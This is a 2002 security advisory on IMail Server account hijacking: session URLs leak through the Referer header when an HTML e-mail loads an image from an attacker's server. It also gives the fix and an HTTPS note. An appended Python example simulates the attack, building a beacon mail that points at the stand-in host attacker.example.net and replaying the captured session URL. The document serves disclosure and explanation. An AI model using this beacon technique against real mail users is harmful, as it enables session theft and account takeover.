Advisory
Title: IMail Account hijack through the Web Interface
Release Date: 10/03/2002
Application: IMail Server
Platform: Windows NT4, Windows 2000, Windows XP
Version: 7.05 or earlier
Severity: Malicious users can easily access other people's accounts.
Author: Obscure^ [obscure@eyeonsecurity.org]
Vendor Status: Informed on 21 Feb 2002; a fix has already been issued to customers.
Web:
http://www.eyeonsecurity.org
http://www.ipswitch.com
Background.
(extracted from
http://www.ipswitch.com/Products/IMail_Server/index.html)
The 20-Minute E-Mail Solution.
IMail Server is an easy-to-use, web-enabled, secure and spam-resistant
mail server for Windows NT/2000/XP. It is the choice of businesses,
schools, and service providers.
A Great Price-Performer.
Unlike Microsoft® Exchange and Lotus® Notes, which are costly
to deploy and cumbersome to administer, IMail Server is easy to
install and easy to manage. It has a simple pricing structure and
is scalable to thousands of users per server.
Problem.
When a user logs in to his account through the Web interface, the session
is authenticated solely by a unique URL: whoever presents that URL is
treated as the logged-in user.
By sending an HTML e-mail that includes an image hosted on another server,
an attacker can easily obtain that unique URL from the Referer field of the
HTTP request: when the victim views the message in the Web interface, the
browser fetches the image and sends the URL of the page being viewed,
session identifier included, as the Referer header.
Exploit Example.
https://www.eyeonsecurity.org/tools/referer.html
A CGI script sends an HTML e-mail whose image tag points to a second CGI
script on the attacker's server; that script reads the Referer header of
the image request and sends the captured session URL to the attacker.
Fix
Upgrade to IMail 7.06. The fixed version also checks the client's IP
address: authentication now relies on the unique URL together with the IP
address from which the session was established, so a stolen URL replayed
from another address is rejected. Users who log in to the IMail Web
interface from behind proxies are still vulnerable, because the server
only ever sees the proxy's address.
PS. This same vulnerability affects Excite Mail.
However, these guys did not contact me back.
Disclaimer.
The information within this document may change
without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any consequences whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information lays within the user's
responsibility.
Update [march 11 2002]
This vulnerability was already published on Bugtraq by Zillion
(zillion AT safemode DOT org). See
http://cert.uni-stuttgart.de/archive/bugtraq/2001/10/msg00082.html
for more information.
Update [march 12 2002]
In my testing, when using HTTPS (secure mode) to access your IMail
account, the Referer is not sent, meaning that clients using
HTTPS should not be vulnerable. This was tested with Internet Explorer 6
and Mozilla 0.9.8 against the tool at:
https://www.eyeonsecurity.org/tools/referer.html
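As an added worked example, not code from this advisory, from IMail or from the eyeonsecurity referer tool, the following Python models the whole chain described in the Problem, Fix and HTTPS update sections above: the HTML mail with a remotely hosted image, the beacon CGI reading the Referer header, a 7.05-style session accepted from any address, a 7.06-style session bound to the login IP (which a second client behind the same proxy or NAT still passes), and the RFC 2616 rule that browsers do not send Referer from an HTTPS page to an HTTP image. The hostnames, the /session/<token>/ URL layout, the session store and the request lines are all constructed for the example.

```python
import secrets
from email.message import EmailMessage
from typing import Optional
from urllib.parse import urlsplit

# Constructed values: hostnames and the /session/<token>/ URL layout are
# assumptions for this example, not IMail's real layout.
WEBMAIL_HOST = "webmail.example.com"
BEACON_URL = "http://attacker.example.net/cgi-bin/beacon.cgi?img=1.gif"


def build_html_mail(to_addr: str, beacon_url: str) -> EmailMessage:
    """The attacker's mail: the image is not attached, it is referenced, so the
    victim's browser fetches it from the attacker when the page is rendered."""
    msg = EmailMessage()
    msg["From"] = "attacker@example.net"
    msg["To"] = to_addr
    msg["Subject"] = "Hello"
    msg.set_content("Please view this message in an HTML capable client.")
    msg.add_alternative(
        "<html><body><p>Hello!</p>\n"
        f'<img src="{beacon_url}"\n'
        ' width="1" height="1"></body></html>\n',
        subtype="html",
    )
    return msg


def parse_request_headers(raw_request: str) -> dict:
    """Lower-cased header dict from an HTTP/1.x request, i.e. what beacon.cgi
    would see as HTTP_REFERER and friends."""
    headers = {}
    for line in raw_request.split("\r\n")[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def browser_sends_referer(page_url: str, image_url: str) -> bool:
    """RFC 2616 section 15.1.3: clients should not send Referer when the page
    was loaded over HTTPS and the target is plain HTTP (the March 12 note)."""
    return not (urlsplit(page_url).scheme == "https"
                and urlsplit(image_url).scheme == "http")


def leaked_session_url(headers: dict, webmail_host: str) -> Optional[str]:
    """Return the webmail URL carried by Referer, or None if nothing leaked."""
    ref = headers.get("referer")
    if ref and urlsplit(ref).hostname == webmail_host:
        return ref
    return None


class WebmailSessions:
    """Toy session-in-URL store: bind_to_ip=False behaves like 7.05,
    bind_to_ip=True like the 7.06 fix that also checks the client address."""

    def __init__(self, bind_to_ip: bool):
        self.bind_to_ip = bind_to_ip
        self._sessions = {}  # token -> (user, ip seen at login)

    def login(self, user: str, client_ip: str, scheme: str = "http") -> str:
        token = secrets.token_hex(16)
        self._sessions[token] = (user, client_ip)
        return f"{scheme}://{WEBMAIL_HOST}/session/{token}/inbox"

    def authenticate(self, session_url: str, client_ip: str) -> Optional[str]:
        parts = urlsplit(session_url).path.split("/")
        if len(parts) < 3 or parts[1] != "session":
            return None
        entry = self._sessions.get(parts[2])
        if entry is None:
            return None
        user, login_ip = entry
        if self.bind_to_ip and client_ip != login_ip:
            return None  # stolen URL replayed from a different address
        return user


def run_attack(bind_to_ip: bool, scheme: str = "http") -> dict:
    """Victim logs in and views the mail; the browser fetches the beacon; the
    attacker replays whatever leaked, from its own address and from the
    victim's address (what a shared proxy or NAT looks like to the server)."""
    sessions = WebmailSessions(bind_to_ip)
    victim_ip, attacker_ip = "203.0.113.10", "198.51.100.7"
    victim_url = sessions.login("alice", victim_ip, scheme)
    mail = build_html_mail("alice@example.com", BEACON_URL)
    if BEACON_URL not in mail.get_body(("html",)).get_content():
        raise RuntimeError("beacon missing from the HTML part")
    # The image request as beacon.cgi receives it (constructed).
    request = ("GET /cgi-bin/beacon.cgi?img=1.gif HTTP/1.0\r\n"
               "Host: attacker.example.net\r\n")
    if browser_sends_referer(victim_url, BEACON_URL):
        request += f"Referer: {victim_url}\r\n"
    request += "\r\n"
    stolen = leaked_session_url(parse_request_headers(request), WEBMAIL_HOST)

    def replay(ip: str) -> Optional[str]:
        return sessions.authenticate(stolen, ip) if stolen else None

    return {"leaked": stolen == victim_url,
            "replay_from_attacker_ip": replay(attacker_ip),
            "replay_from_victim_ip": replay(victim_ip)}
```

Running run_attack(False) shows the 7.05 situation (URL leaks and replays from anywhere); run_attack(True) shows the 7.06 check rejecting the attacker's address while a client sharing the victim's address still gets in; run_attack(True, scheme="https") shows why the HTTPS test leaked nothing: the browser never sends the Referer to the plain-HTTP beacon.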
Feedback.
Please send suggestions, updates, and comments to:
Eye on Security
mail:obscure@eyeonsecurity.org
http://www.eyeonsecurity.org